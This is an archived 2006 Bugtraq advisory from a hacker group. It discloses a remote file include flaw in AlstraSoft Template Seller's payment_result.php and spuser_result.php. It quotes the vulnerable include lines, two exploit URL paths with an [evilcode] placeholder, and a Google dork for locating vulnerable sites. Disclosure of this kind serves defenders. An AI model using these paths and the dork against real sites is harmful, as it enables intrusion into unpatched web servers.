lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20060901182411.28235.qmail@securityfocus.com>
Date: 1 Sep 2006 18:24:11 -0000
From: jong_amq@...mail.com
To: bugtraq@...urityfocus.com
Subject: SolpotCrew Advisory #7 - AlstraSoft Template Seller Remote File
 Include Vulnerability

#############################SolpotCrew Community################################
#
#        AlstraSoft Template Seller Remote File Include Vulnerability 
#
#        Download file : http://www.alstrasoft.com/template.htm
#
#################################################################################
#
#
#       Bug Found By : NoGe a.k.a da_jackass 
#
#       contact: jong_amq@...mail.com 
# 
#       Website : http://nyubicrew.org/adv/Noge_adv_01.txt
#
################################################################################
#
#
#      Greetz: skulmatic[thanks for sharing knowledge] h4ntu[for the video] olibekas solpotcrew PremanMedan
#              yooogy[pa bozz] siwa^lima sagu mousekill ilalang13
#              #papmahackerlink #nyubi #maluku-hacker #papuahacker
#              
###############################################################################
# Vulnerable found in 

payment_result.php and spuser_result.php 

line 6 include("$config[template_path]/onlyheader.php"); 
line 7 include("$config[template_path]/onlysearch.php"); 


# Exploit 

/payment/payment_result.php?config[template_path]=[evilcode] 

/payment/spuser_result.php?config[template_path]=[evilcode] 


# google dork 

"Powered by AlstraSoft Template Seller" 

######################################E.O.F##################################

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ